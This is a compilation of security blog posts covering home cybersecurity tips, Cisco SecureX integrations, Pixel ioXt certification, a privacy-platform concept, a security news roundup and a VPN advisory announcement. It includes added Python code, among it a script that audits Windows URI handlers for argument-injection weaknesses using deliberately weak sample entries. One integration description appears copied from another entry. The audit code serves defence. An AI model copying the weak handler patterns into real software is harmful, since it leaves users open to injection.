
They may be under your roof for more hours of the day than usual, but your children are also likely to be spending more time online. That means you need to have a measured conversation with them about internet safety, backed up with parental controls. Consider the following:

  • Urge your kids to think before clicking, and before sharing on social media.
  • Make sure you have installed anti-malware from a reputable vendor on all their devices.
  • Look for security products that check/update their social media privacy settings.
  • Discourage or block downloads from P2P sites.
  • Set up parental controls to block inappropriate content and/or to regulate screen time and time on certain sites or with certain apps. Then set up admin protections, so they can’t change the settings.
  • Share your concerns around sexting.

Mobile security best practices

Finally, sheltering at home has limits, particularly for restless kids. When they go to the store or out to the park, facemasks notwithstanding, they’re likely going to use their mobile devices, just as they’ll continue to do at home. Of course, you’re not exempt either from mobile threats. Ensure mobile security by:

  • Sticking to the official Google Play and App Store marketplaces. Enforce this through smart settings on your children’s phones.
  • Running anti-malware on your mobile device, from a reputable company like Trend Micro.
  • Ensuring your family’s devices are using the latest OS version.
  • Ensuring your family devices have remote lock and wipe feature switched on, in case they’re lost or stolen.
  • Never root or jailbreak the device, as this can expose it to security risks.

How Trend Micro can help

When it comes to protecting the home from security and privacy threats during lockdown, leave no stone unturned. Cyber-criminals will always look for the weak link in the chain and focus their efforts there. Network security is important, but it doesn’t replace the need for protection on each individual device. You’ll need to cover your router, network, smart devices, and all endpoints (PCs, laptops, mobiles and other devices). Here’s how Trend Micro can help:

Trend Micro Home Network Security

Trend Micro Home Network Security provides industry-leading protection against any threats to internet-connected devices in the home. The solution

  • Blocks dangerous file downloads during web browsing to stop ransomware, data theft, phishing, and other malware. Blocks remote access applications.
  • Protects all smart devices, such as smart TVs, thermostats, security cameras, etc., that don’t have their own security solutions.
  • Parental Controls and Guardian allow parents to track and restrict their children’s internet usage at home and on-the-go, which could free-up bandwidth for important conference calls.

Trend Micro Security (PC and Mac)

Trend Micro Security, available in various editions (led by Trend Micro Maximum Security), is Trend’s flagship endpoint security product for consumers. Available for both PCs and Macs, it features AI learning to stop advanced threats. Among a wide range of protections, it includes:

  • Web Threat Protection when browsing the internet, defending you against bad websites that can steal your data or download malicious files.
  • Machine Learning, to protect you from new and unknown threats.
  • Ransomware protection via Folder Shield, to stop unauthorized changes and back-up files encrypted by suspicious programs.
  • Anti-phishing and anti-spam protection for Outlook clients, as well as Gmail and Outlook webmail on the PC, and Gmail webmail on the Mac.
  • Privacy Scanner (for Facebook and Twitter), Social Networking Protection for protection against malicious links in social networks, Pay Guard for protecting your online banking and buying.
  • Parental Controls to limit which software and websites your kids may use.

Trend Micro Mobile Security:

Trend Micro Mobile Security provides endpoint security for all your mobile devices, whether Android or iOS-based.

  • Blocks dangerous websites and app downloads.
  • Helps protect your privacy on Twitter and Facebook.
  • Protects your kids’ devices.
  • Guards against identity theft.
  • Optimizes your device’s performance.

Additional Trend Micro Tools:

Network and endpoint security should be supplemented with tools that accomplish specific tasks, such as protecting your internet connections, your passwords, and your identity data. Trend Micro provides

  • Wi-Fi Protection / VPN Proxy One (Mac and iOS). Two VPNs, with an emphasis on web threat protection and on privacy, respectively. The first is available on all four platforms (PC, Mac, Android and iOS); the second is targeted at Apple devices.
  • Password Manager. Manages and encrypts your passwords, and automates your logins, while ensuring you use unique, strong passwords across all of your online accounts.
  • ID Security. Tracks your credentials, particularly the ones you use for buying and banking, to see if breaches of any of your identity data have led to their sale on the Dark Web. Notifies you when it has, so you can take steps to protect it.
  • Premium Services. Parents working from home are not expected to be IT or Security experts, so now’s the time to ensure professional help is around when you need it by signing up for one of Trend Micro’s premium service packages for help configuring, troubleshooting, optimizing, and disinfecting your devices if they get infected.

Maintaining your family’s security and privacy on all their devices during the coronavirus lockdown above all means changing your mindset, to take into account the mix of work and play in the household during the “new normal.” Use these tips and tools during lockdown and you’ll be well on your way to ensuring you and your family’s safety from malicious viruses—both digital and natural.

The post Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World (part 2) appeared first on .

SecureX threat response Ecosystem

A few months ago, Cisco Security announced the SecureX platform with two core capabilities: threat response and orchestration. In that announcement, we brought attention to nearly two dozen integrations with SecureX threat response, formerly Cisco Threat Response.


With SecureX, you can accelerate threat hunting and incident response by seamlessly integrating SecureX threat response and your existing security technologies. You have the flexibility to bring your tools together, whether it’s with integrations that are built-in, pre-packaged, or custom. If you have Cisco Stealthwatch, Firepower, AMP for Endpoints, Umbrella, Email Security, Web Security, or Threat Grid, SecureX threat response is included with your license at no additional cost.

  • Connect your entire security stack–Cisco or otherwise–for faster investigations
  • Aggregate and correlate security context from multiple technologies in one view
  • Get the most out of your existing security investments, including from our technology partners

The SecureX platform has three categories of integrations:

  • Built-in integrations are developed by Cisco, or select technology partners, for customers to instantly configure. These are typically integrations where SecureX threat response produces threat intelligence that is visualized in the partner’s user interface, though there are exceptions, such as VirusTotal, or cases where a partner builds the threat response APIs into their core code.
  • Pre-packaged integrations are developed by Cisco or technology partners as ready-made scripts that customers install into cloud infrastructure they maintain. The time spent is minimized, as you don’t need to learn any APIs or write any code. These are typically SecureX threat response modules that produce threat intelligence to be visualized in SecureX, and they appear as available modules there.
  • Custom integrations can be created by customers leveraging Cisco and technology partners’ open APIs. The time spent on integration is reduced by using our resources on DevNet to quickly get started, including training, links to code on GitHub and extensive use case and workflow documentation on ReadtheDocs.

We made a promise in late April: “… we’re speeding up detection, investigation, and remediation across your environment with many more pre-packaged integrations.” We are pleased to announce that the time is now.

Built-in integrations

Google VirusTotal*

VirusTotal is a free service that inspects items with over 70 antivirus (AV) scanners and URL/domain blocklist services. The threat response VirusTotal module allows you to query a URL, IP address, domain or file hash during the incident response process, to gain additional context from the AV scanners and services about the threats associated with the sample. You can register for a free VirusTotal account and receive an API key; Threat Response uses the API key on your behalf to include VirusTotal query results in any investigation.

IBM Security QRadar SIEM

The threat response extension provides the ability to right-click and pivot from an IP address in QRadar into an investigation in the Threat Response console, and to hover over 100+ property field types to query threat response for Verdicts.

Polarity Data Awareness

The threat response integration allows Polarity to search the Threat Response Enrich API to return information about various indicator types.

ServiceNow Security Operations

ServiceNow Security Operations (Security Incident Response and Threat Intelligence) can leverage the Verdicts, Refer and Response capabilities provided by threat response to assist the security analyst in their investigation workflow. This enables the analyst to take response actions from within ServiceNow to remediate threats.

Splunk Enterprise Security

SecureX Threat Response Add-On for Splunk provides a custom search command allowing users to query threat response for targets and verdicts from observables within a Splunk instance.

Splunk Phantom

The Phantom threat response plug-in enables a user, or an automated playbook/action, to initiate a query to threat response for Verdicts or Sightings of an observable and render the results in a table.

Swimlane Security Operations Management

Swimlane threat response plugin allows connection to the Threat Response API, to extract and enrich observables.

TheHive Project – Cortex Analyzers*

The threat response analyzer connects to TheHive, a scalable, open source and free Security Incident Response Platform, tightly integrated with MISP (Malware Information Sharing Platform), designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner dealing with security incidents that need to be investigated and acted upon swiftly.

Pre-packaged integrations

To utilize the pre-packaged integrations, you must first deploy cloud infrastructure to host the threat response serverless Relay API. We created a step-by-step installation guide and recorded tutorials to make this easier, plus code on GitHub that is pre-configured for AWS Lambda. The API itself is just a simple Flask (WSGI) application, which can be packaged and deployed as an AWS Lambda Function behind an AWS API Gateway proxy using Zappa. An already deployed Relay API (e.g., packaged as an AWS Lambda Function) can be pushed to threat response as a Relay Module using the Threat Response Relay CLI. The threat response Python API module is available via pip install.
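
Here is what such a relay module looks like at the code level, as an added example that is not Cisco’s or any partner’s code: a stand-alone WSGI application (the reference modules use Flask; this one uses only the Python standard library so it runs with no dependencies) that answers the relay endpoints threat response calls and turns a constructed blocklist into CTIM Verdicts and Judgements. The endpoint paths (/health, /deliberate/observables, /observe/observables), the CTIM field names and disposition numbers, and the BLOCKLIST feed are my assumptions based on the public Relay API documentation, not taken from the post. A production relay would also validate the JWT that threat response sends in the Authorization header (it carries the partner API key); that check is omitted here.

```python
"""Minimal SecureX threat response relay module (added example; stdlib WSGI, not Cisco's code)."""
import io
import json
from datetime import datetime, timedelta, timezone

# Constructed stand-in for a partner's blocklist feed: observable type -> value -> feed name.
BLOCKLIST = {
    "ip": {"198.51.100.23": "scanner-feed"},
    "domain": {"bad.example": "phishing-feed"},
    "sha256": {},
}
# Assumption: CTIM disposition codes (1 Clean, 2 Malicious, 3 Suspicious, 4 Common, 5 Unknown).
MALICIOUS, UNKNOWN = (2, "Malicious"), (5, "Unknown")


def valid_time(hours=24):
    """CTIM valid_time window for a verdict/judgement, starting now (UTC)."""
    start = datetime.now(timezone.utc).replace(microsecond=0)
    return {"start_time": start.isoformat(),
            "end_time": (start + timedelta(hours=hours)).isoformat()}


def lookup(observable):
    """Return (disposition, disposition_name, feed) for an observable; feed is None on a miss."""
    feed = BLOCKLIST.get(observable["type"], {}).get(observable["value"])
    return (*MALICIOUS, feed) if feed else (*UNKNOWN, None)


def verdicts_for(observables):
    """One Verdict per observable, Malicious if any feed lists it, otherwise Unknown."""
    docs = []
    for obs in observables:
        disp, name, _ = lookup(obs)
        docs.append({"type": "verdict", "observable": obs, "disposition": disp,
                     "disposition_name": name, "valid_time": valid_time()})
    return docs


def judgements_for(observables):
    """A Judgement is the evidence behind a Malicious verdict: which feed saw it."""
    docs = []
    for obs in observables:
        disp, name, feed = lookup(obs)
        if feed:
            docs.append({"type": "judgement", "observable": obs, "disposition": disp,
                         "disposition_name": name, "source": feed, "confidence": "High",
                         "severity": "High", "priority": 90, "valid_time": valid_time()})
    return docs


def wrap(name, docs):
    return {name: {"count": len(docs), "docs": docs}}


def deliberate(observables):
    return {"data": wrap("verdicts", verdicts_for(observables))}


def observe(observables):
    return {"data": {**wrap("verdicts", verdicts_for(observables)),
                     **wrap("judgements", judgements_for(observables))}}


ROUTES = {"/deliberate/observables": deliberate, "/observe/observables": observe}


def application(environ, start_response):
    """WSGI entry point: threat response POSTs a JSON list of observables to a route."""
    path = environ.get("PATH_INFO", "")
    if path == "/health":
        body, status = {"data": {"status": "ok"}}, "200 OK"
    elif path in ROUTES and environ.get("REQUEST_METHOD") == "POST":
        length = int(environ.get("CONTENT_LENGTH") or 0)
        observables = json.loads(environ["wsgi.input"].read(length) or b"[]")
        body, status = ROUTES[path](observables), "200 OK"
    else:
        body, status = {"errors": [{"code": "not found"}]}, "404 Not Found"
    payload = json.dumps(body).encode()
    start_response(status, [("Content-Type", "application/json"),
                            ("Content-Length", str(len(payload)))])
    return [payload]


def call(path, observables):
    """Drive the app in-process (no network): returns (status, parsed JSON body)."""
    raw = json.dumps(observables).encode()
    environ = {"REQUEST_METHOD": "POST", "PATH_INFO": path,
               "CONTENT_LENGTH": str(len(raw)), "wsgi.input": io.BytesIO(raw)}
    captured = {}
    body = b"".join(application(environ, lambda status, headers: captured.update(status=status)))
    return captured["status"], json.loads(body)


if __name__ == "__main__":
    from wsgiref.simple_server import make_server
    make_server("127.0.0.1", 8080, application).serve_forever()
```

Run it with python and POST `[{"type":"ip","value":"198.51.100.23"}]` to http://127.0.0.1:8080/deliberate/observables; call() drives the same app in-process. The observe endpoint returns the Judgements (the feed that produced the hit) alongside the Verdict, which is the evidence an analyst pivoting from SecureX wants to see, and it is the same split the module descriptions below refer to when they list returned entities.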

Abuse IPDB*

Threat response module for the investigation of IPs and URLs. AbuseIPDB supports both IPv4 and IPv6. API limits: 1000 / day. Returned Entities: Verdicts, Judgements, Sightings, Indicators.

AlienVault OTX*

Threat Response module to query AlienVault OTX for observables (IPv4, IPv6, domain, hash values) and return Sightings and Indicators from the “Pulses” in AlienVault. Pivot to the AlienVault OTX UI via refer actions.

APIVoid

Threat Response module for the investigation of IPs or domains; receives Sightings from APIVoid’s blocklist aggregation.

Auth0 Signals*

Threat Response module for investigation of IPs. Query Auth0 Signals for an IP address to find out if it is on any blocklists. Return verdicts for the IP based on the scoring provided. Returns Open-Source Intelligence (OSINT) context from over 100 curated and normalized blocklists.

C1fApp

SecureX threat response module for the investigation of IP addresses. SecureX receives a Verdict from C1fApp: the Verdict is Malicious when the observable is found on a block list, and the Indicator is the feed on which it was seen.

CyberCrime Tracker*

Threat response module for the investigation of IPs and URLs, returning CyberCrime Tracker Verdicts and Judgements.

Cyberprotect Threatscore*

Threat response module for the investigation of IPs, domains, hashes and file names. Returned Entities: Verdicts and Judgements.

Farsight Security

The Farsight Security SecureX threat response module enables a user to initiate an investigation for verdicts on IPs and domains. Farsight Security DNSDB provides enrichment data about IP addresses (IPv4 and IPv6) and domains. Certified as Cisco Compatible.

Gigamon ThreatINSIGHT

The Gigamon ThreatINSIGHT module enables threat response to query network and threat data for Sightings of observables from the Gigamon intelligence. Gigamon completed the Cisco Compatible Certification for the integration and published a joint solution brief.

Google Chronicle

The Google Chronicle threat response module enables queries for Sightings of observables (IP, domain, hash, file name, file path) within the SIEM. It can also list assets, obtain IOC details, list alerts within a time range, and list IOCs within a time range.

Google Safe Browsing

Threat response module integrating Google Safe Browsing, a blocklist service provided by Google that publishes lists of URLs for web resources that contain malware or phishing content. Google Chrome, Safari, Firefox, Vivaldi and GNOME Web check pages against the Safe Browsing lists, and this integration brings that blocklist intelligence into threat response.

Have I Been Pwned*

Threat response module for the investigation of a SHA256. The module adds context around a compromised email address, the username associated with it, and that user’s standing in the environment. If the Cisco Email Security Appliance module is enabled, it also reports that this SHA256 has been sent to the identified email addresses, which have been seen in data breaches. Requires a small monthly subscription.

Microsoft Graph Security

The Microsoft Graph Security module queries for Sightings of observables (IP, domain, hash, file name, file path) within Graph Security Alerts. Threat Response can access large volumes of Microsoft-centric data as well as data from third parties in a standardized format.


Threat response module for the investigation of URLs. Returns the Verdict.

Qualys IOC

The Qualys Indication of Compromise threat response module is used for the investigation of Sightings of supported observables on Targets. It supports hashes (MD5, SHA256) of the file image on disk, of the image on disk for a running process, and of the image on disk for loaded modules, as well as File Name (Process Name), IP, Domain, File Path and Mutex.

Radware WAF and DDoS

SecureX threat response modules for IP address(es) investigation, for both WAF and DDoS abusive activity, along with Indicators for those Sightings. Certified as Cisco Compatible.

SecurityTrails

Query SecurityTrails with this module for enrichment data about domains and IP addresses (IPv4 and IPv6). Pivot to the SecurityTrails UI to search for domains and IP addresses (IPv4 and IPv6).

ServiceNow Security Operations

The ServiceNow module in Threat Response, enables ServiceNow to be a data source when the analyst starts an investigation in the Threat Response UI or via the API. This enables the analyst to query ServiceNow for historical context from previous incidents that involved a given observable.

Shodan

Adds Shodan to the SecureX threat response Pivot / Respond menu on an IP address. Shodan is a search engine for Internet-connected devices. Web search engines, such as Google and Bing, are great for finding websites.

Signal Sciences Web Application Protection

Signal Sciences is a leading web application security company, with a next-gen web application firewall (WAF) and runtime application self-protection (RASP) solution. Through the threat response integration developed by Signal Sciences, your Security Operations team has immediate visibility into attacks across all web application workloads, and with the integration you can take immediate action. Certified as Cisco Compatible.

SpyCloud

The SecureX threat response SpyCloud module lets users initiate an investigation into a SHA256. The module adds context around a compromised email address, the username associated with it, and that user’s standing in the environment. If the Cisco Email Security module is enabled, it also reports that this SHA256 has been sent to email addresses that have been seen in data breaches.

ThreatQuotient Security Operations Platform

ThreatQuotient periodically posts Judgements and Verdicts of observables to Cisco Threat Intelligence API, for visualization in threat response.  In addition, ThreatQ uses threat response as an enrichment source for threat intelligence.*

SecureX threat response module to submit URL(s) into for threat intelligence context.

The SecureX ecosystem will continue to grow, with additional integrations in development now, both by Cisco and our technology partners. You and your organization are also empowered to build your own. The power of the SecureX platform is yours.

Acknowledgements: My thanks to Michael Auger, manager of ecosystem integrations, and my partner in this endeavor. Michael designed the relay architecture that made rapid development possible, between SecureX and technology partners. Michael led a team of a dozen developers, program managers and quality assurance engineers, and worked closely with partners’ engineering teams, to build 27 integrations with 24 partners for the initial SecureX release. Well done!!

*Community/open source



The post SecureX threat response Ecosystem appeared first on Cisco Blogs.

Pixel 4a is the first device to go through ioXt at launch

Trust is very important when it comes to the relationship between a user and their smartphone. While phone functionality and design can enhance the user experience, security is fundamental and foundational to our relationship with our phones. There are multiple ways to build trust around the security capabilities that a device provides and we continue to invest in verifiable ways to do just that.

Pixel 4a ioXt certification

Today we are happy to announce that the Pixel 4/4 XL and the newly launched Pixel 4a are the first Android smartphones to go through ioXt certification against the Android Profile.

The Internet of Secure Things Alliance (ioXt) manages a security compliance assessment program for connected devices. ioXt has over 200 members across various industries, including Google, Amazon, Facebook, T-Mobile, Comcast, Zigbee Alliance, Z-Wave Alliance, Legrand, Resideo, Schneider Electric, and many others. With so many companies involved, ioXt covers a wide range of device types, including smart lighting, smart speakers, webcams, and Android smartphones.

The core focus of ioXt is “to set security standards that bring security, upgradability and transparency to the market and directly into the hands of consumers.” This is accomplished by assessing devices against a baseline set of requirements and relying on publicly available evidence. The goal of ioXt’s approach is to enable users, enterprises, regulators, and other stakeholders to understand the security in connected products to drive better awareness towards how these products are protecting the security and privacy of users.

ioXt’s baseline security requirements are tailored for product classes, and the ioXt Android Profile enables smartphone manufacturers to differentiate security capabilities, including biometric authentication strength, security update frequency, length of security support lifetime commitment, vulnerability disclosure program quality, and preloaded app risk minimization.

We believe that using a widely known industry consortium standard for Pixel certification provides increased trust in the security claims we make to our users. NCC Group has published an audit report that can be downloaded here. The report documents the evaluation of Pixel 4/4 XL and Pixel 4a against the ioXt Android Profile.

Security by Default is one of the most important criteria used in the ioXt Android profile. Security by Default rates devices by cumulatively scoring the risk for all preloads on a particular device. For this particular measurement, we worked with a team of university experts from the University of Cambridge, University of Strathclyde, and Johannes Kepler University in Linz to create a formula that considers the risk of platform signed apps, pregranted permissions on preloaded apps, and apps communicating using cleartext traffic.

Screenshot of the presentation of the Android Device Security Database at the Android Security Symposium 2020

In partnership with those teams, Google created Uraniborg, an open source tool that collects necessary attributes from the device and runs it through this formula to come up with a raw score. NCC Group leveraged Uraniborg to conduct the assessment for the ioXt Security by Default category.

As part of our ongoing certification efforts, we look forward to submitting future Pixel smartphones through the ioXt standard, and we encourage the Android device ecosystem to participate in similar transparency efforts for their devices.

Acknowledgements: This post leveraged contributions from Sudhi Herle, Billy Lau and Sam Schumacher

Preparing for the Unpredictable: Imagining a Data Security and Privacy Platform

With stricter privacy regulations, evolving customer expectations, and growing work-from-home demands, organizations need a simple way to know, see, and manage their data. Luckily, we’ve got a few ideas. 

Security is all about the data. Protecting data is the reason companies invest in security infrastructure and services like threat detection, data loss prevention, strong multi-factor authentication, etc. But where there should be a data visibility and management layer, instead there’s a gaping hole.

As a distinguished engineer working in the Security Business Group’s Office of the CTO, I’m part of a team responsible for planning the future of Cisco’s security offerings. One of our initiatives is imagining a data security and privacy platform to give organizations visibility and control of sensitive data like personally identifiable information (PII). After 32 years of working in the cybersecurity industry, this is very exciting for me.

Business and society demand trust and privacy

Privacy is very much front and center for decision makers. In the 2019 Cisco Data Privacy Benchmark Study, 87% of respondents (up from 65% in 2018) said that customer questions about data privacy delay sales. Companies face hefty fines if they don’t comply with regulations, like the EU’s General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA). Continuing work from home means more data lives on endpoints outside an organization’s control. And increased data variety (think virtual meeting information, contact tracing, smartphone videos, etc.), volume, and velocity make it harder for chief information security officers (CISOs) to be certain of what data is stored and where it is flowing.

Business aside, privacy and trust are essential for a functioning society. A digital economy can succeed only if it’s trusted. At Cisco we think of privacy as a fundamental human right. It’s part of our mission statement: “To inspire new possibilities by reimagining your applications, securing your data, transforming your infrastructure, and empowering your teams.”

Narrowing in on the problem

My team works with customers and our own IT organization to better understand data security and privacy challenges and imagine what a solution might look like. Our customers’ wish list can be distilled down to three requirements: awareness (know your data), visibility (see your data), and management (control your data). With that in mind, we’ve put some ideas together to help address the most critical requirements.

1. Comprehensive data map

Many CISOs say they struggle with two questions: where are the data stores, and what information needs to be protected? These are hard to answer when more than half of an organization's data is unseen, the so-called "databerg." If you don't know what data you have, you cannot gauge the risk if it is leaked or compromised.

The data security platform we're imagining might produce a real-time data map, built from queries over tuples of attributes, showing where data is stored, how sensitive it is, where it is shared, how long it is retained, and how it is used. For example, a CISO might want a visual of the data centers and geographies where employee PII is stored.

2. The power of combined context

We are exploring the concept of creating multiple, rich contextual stores that include applications, users/identities, and services along with datastores and data files. Some of this rich context is already available through existing Cisco technologies such as Advanced Malware Protection, Tetration, Umbrella, and Identity Services Engine. We’re also considering plug-and-play integration with common business platforms, such as Salesforce, Microsoft Office 365, and Workday.

Going further, we are investigating the possibilities of combining rich infrastructure telemetry, applications telemetry, and file metadata to build a comprehensive visibility and control fabric. In addition to helping customers make the journey from databerg to data map, we want to give them the power to visualize risk, control access, and assure compliance. 

3. Simple user experience

The people who need to know, see, and manage data security and privacy include data stewards, data owners, and privacy operations specialists. Some are technical, some aren't. To keep the user experience simple, we envision a single user interface, like Cisco SecureX, with different dashboards tailored to the user's role. In our current thinking, a data steward would see a data map of where all the sensitive data is stored, by region. A data owner would be able to create policies on who can see data and where they can move it. A privacy operations specialist would be able to fulfill data subject access requests (DSARs) as required by GDPR and CCPA.

Bringing all privacy activities onto one platform

As I write this, we’re working to provide more visibility into metrics from our own solutions, plan new initiatives, and explore partnerships with other companies. Our end goal is bringing everything you need to know, see, and manage sensitive data onto one platform. It’s good for business, good for individuals, and good for society.

That’s a glimpse into our thinking. We’re interested in yours. What would you like to see in a privacy platform? Please let us know in the comments below.

The post Preparing for the Unpredictable: Imagining a Data Security and Privacy Platform appeared first on Cisco Blogs.

This Week in Security News: Robots Running the Industrial World Are Open to Cyber Attacks and Industrial Protocol Translation Gone Wrong

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. Based on research that Trend Micro released during Black Hat USA this past week, read about how some industrial robots have flaws that could make them vulnerable to advanced hackers, as well as the risks related to protocol gateways and how to secure these devices.


Read on:

Unveiling the Hidden Risks of Industrial Automation Programming

The legacy programming environments of widely used industrial machines could harbor virtually undetectable vulnerabilities and malware. Trend Micro’s recent security analysis of these environments, presented at Black Hat USA 2020 this week, reveals critical flaws and their repercussions for smart factories.

Top 6 Cybersecurity Trends to Watch for at Black Hat USA 2020

At this year’s Black Hat USA 2020 conference, some of the top trends expected to surface include ransomware, election security and how to protect a remote workforce. Trend Micro’s vice president of cybersecurity, Greg Young, said, “Cybercrime increased rather than slowed down due to the pandemic, as we saw 1 billion more threats blocked in the first half of 2020 compared to 2019.”

Lost in Translation: When Industrial Protocol Translation Goes Wrong

Also presented this week at Black Hat USA, this recent research from Trend Micro examines the risks related to protocol gateways, the possible impact of an attack or wrong translation, and ways to secure these devices.

‘Alarming’ Rate of Cyberattacks Aimed at Major Corporations, Governments and Critical Infrastructure Amid COVID-19: Report

As COVID-19 cases around the U.S. continue to rise, the International Criminal Police Organization (INTERPOL) says that governments are seeing an “alarming” rate of cyberattacks aimed at major corporations, governments and critical infrastructure.

Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts

A series of ongoing business email compromise (BEC) campaigns that use spear-phishing against Office 365 accounts has targeted executives at more than 1,000 companies globally since March. The campaigns focus on senior positions in the United States and Canada; the fraudsters, dubbed "Water Nue" by Trend Micro, primarily go after the accounts of financial executives to obtain credentials for further financial fraud.

Robots Running the Industrial World Are Open to Cyber Attacks

Industrial robots now assemble everything from airplanes to smartphones, using human-like arms to repeat the same motions thousands of times a day with high precision. But according to a new report from Trend Micro, some robots have flaws that could let advanced attackers steal data or alter a robot's movements remotely.

Patch Fail Led to Password Leak of 900 VPN Enterprise Servers

Applying a security update for a CVE published more than a year ago would have prevented an attacker from publishing plaintext usernames and passwords, along with IP addresses, for more than 900 Pulse Secure VPN enterprise servers. The vulnerability, CVE-2019-11510, was one of several recently exploited by Russia's Cozy Bear (APT29) in attempts to steal COVID-19 vaccine research.

U.S. Offers Reward of $10M for Info Leading to Discovery of Election Meddling

The U.S. government is concerned about foreign interference in the 2020 election, so much so that it will offer a reward of up to $10 million for anyone providing information that could lead to tracking down potential cybercriminals aiming to sabotage the November vote.

TeamViewer Flaw Could be Exploited to Crack Users’ Password

A high-risk vulnerability in TeamViewer for Windows could be exploited by remote attackers to crack users' passwords and, consequently, lead to further system exploitation. CVE-2020-13699 is classified as an unquoted search path or element weakness; more specifically, the application does not properly quote the command line of its custom URI handler, and the flaw can be triggered when a user running a vulnerable version of TeamViewer visits a maliciously crafted website.
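The weakness class in this item, a URI scheme handler registered with an unquoted command line, can be audited on any Windows host by walking the registered protocol handlers. The Python below is an added example, not TeamViewer's or Trend Micro's code: it checks the two places a handler command line needs quotes (the executable path and the %1 placeholder that receives the attacker-influenced URI), runs against a constructed sample table, and on Windows can read the real handlers from HKEY_CLASSES_ROOT\<scheme>\shell\open\command (the standard layout; assumed here, not taken from the article).

```python
r"""
Audit Windows URL-protocol (custom URI scheme) handlers for unquoted
command lines.

A handler lives under HKEY_CLASSES_ROOT\<scheme>\shell\open\command and its
default value is the command line Windows runs when a browser opens a
<scheme>: URI, for example:

    "C:\Program Files\Vendor\app.exe" "%1"

Two things must be quoted: the executable path (an unquoted path with
spaces is an unquoted search path) and the %1 placeholder that receives
the URI (unquoted, a crafted URI can inject extra arguments).
Added example, not TeamViewer's code; the sample table is constructed.
"""
import re
from typing import Dict, List

# A command line that starts with a quoted executable path.
_QUOTED_EXE = re.compile(r'^\s*"[^"]+\.exe"', re.IGNORECASE)
# A %1 placeholder wrapped in quotes, e.g. "%1".
_QUOTED_ARG = re.compile(r'"\s*%1\s*"')

# Constructed sample: three registered schemes as they might appear in HKCR.
SAMPLE_HANDLERS: Dict[str, str] = {
    # Hardened: both the path and the URI argument are quoted.
    "goodapp": r'"C:\Program Files\GoodApp\goodapp.exe" "%1"',
    # Weak: path quoted, but the URI placeholder is not.
    "weakapp": r'"C:\Program Files\WeakApp\weakapp.exe" %1',
    # Weak: nothing quoted at all.
    "legacyapp": r"C:\Program Files\Legacy App\legacy.exe %1",
}


def audit_handler(command: str) -> List[str]:
    """Return the findings for one handler command line (empty list = OK)."""
    findings: List[str] = []
    cmd = command.strip()
    if not cmd:
        return ["empty command"]
    if not _QUOTED_EXE.match(cmd):
        # Everything before the placeholder is taken as the executable path.
        exe_part = cmd.split("%1")[0].strip()
        if " " in exe_part:
            findings.append("unquoted executable path containing spaces")
    if "%1" in cmd and not _QUOTED_ARG.search(cmd):
        findings.append("URI placeholder %1 is not quoted (argument injection)")
    return findings


def audit_handlers(handlers: Dict[str, str]) -> Dict[str, List[str]]:
    """Audit a {scheme: command} map and return only the schemes with findings."""
    results: Dict[str, List[str]] = {}
    for scheme, command in handlers.items():
        findings = audit_handler(command)
        if findings:
            results[scheme] = findings
    return results


def collect_handlers_from_registry() -> Dict[str, str]:
    """Enumerate registered URL protocol handlers from HKCR (Windows only)."""
    import winreg  # standard library, but only present on Windows

    handlers: Dict[str, str] = {}
    index = 0
    while True:
        try:
            name = winreg.EnumKey(winreg.HKEY_CLASSES_ROOT, index)
        except OSError:
            break  # no more subkeys
        index += 1
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, name) as key:
                winreg.QueryValueEx(key, "URL Protocol")  # only URI schemes carry this value
                command = winreg.QueryValue(key, r"shell\open\command")
        except OSError:
            continue  # not a URI scheme, or no open command registered
        if command:
            handlers[name] = command
    return handlers


if __name__ == "__main__":
    import sys

    table = collect_handlers_from_registry() if sys.platform == "win32" else SAMPLE_HANDLERS
    for scheme, findings in audit_handlers(table).items():
        print(f"{scheme}: {'; '.join(findings)}")
```

Run it on a Windows host to list every scheme whose handler would accept injected arguments; on any other platform it audits the constructed sample. A finding on the placeholder is the more serious of the two, because the URI is supplied by whatever web page the user visits.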

Black Hat: How Your Pacemaker Could Become an Insider Threat to National Security

Implanted medical devices are an overlooked security challenge that is only going to grow over time. The problem of vulnerabilities and attack avenues in IMDs was brought to broad public attention by the 2017 case of St. Jude (now under the Abbott umbrella), in which the US Food and Drug Administration (FDA) issued a voluntary recall of 465,000 pacemakers due to vulnerabilities that could be remotely exploited to tamper with the life-saving equipment.

What was your favorite session from Black Hat USA this week? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Robots Running the Industrial World Are Open to Cyber Attacks and Industrial Protocol Translation Gone Wrong appeared first on .

I’m Partnering with NordVPN as a Strategic Advisor


I love security. I love privacy. Consequently, it will come as no surprise that I love tools that help people achieve those objectives. Equally, I have no patience for false promises, and I've been very vocal about my feelings there:

VPNs are a great example of where a tool can be used to enhance security and privacy but often, they fall short of delivering on the promise. When you use a VPN, you're trusting a third party with your traffic and even in an increasingly "encrypted by default" web, you're taking a leap of faith with who you choose to route your bytes.

A few months ago, NordVPN sponsored this blog and we got to chatting. I had a long call with Tom Okman (that link is a good read on their background) who co-founded the company in 2012 and I expressed my dismay at the trustworthiness (or lack thereof) of so many VPNs in the market. This was before the embedded tweet above but well after I'd written about dodgy VPNs:

Whoever can see your traffic - be that your local ISP or the VPN provider you decide to use - has an enormous responsibility and you're placing a huge amount of trust in them

I really pressed Tom on the trust piece - why should people trust NordVPN? The promise of "no logs" in particular is a favourite of VPN providers yet evidently, the reality doesn't always meet the promise. Turns out they'd just had their second PwC audit to verify their claims and came out clean which is a pretty solid way of demonstrating their commitment to privacy. Having a Big Four firm do any sort of formal audit wouldn't have been a cheap experience and the fact Tom and co recognised the value, not just in making claims but proving them too, carries a lot of weight.

But there were also aspects of NordVPN I told Tom needed work, especially around their messaging in marketing material. Look, I get it, marketing people like to embellish but, in my view, there were occasions where that went beyond what you could reasonably expect a VPN to do. You can't on the one hand put all this work into trust and transparency and then on the other hand convey messaging that impacts trust and transparency! And yes, I have strong views on these things 😊

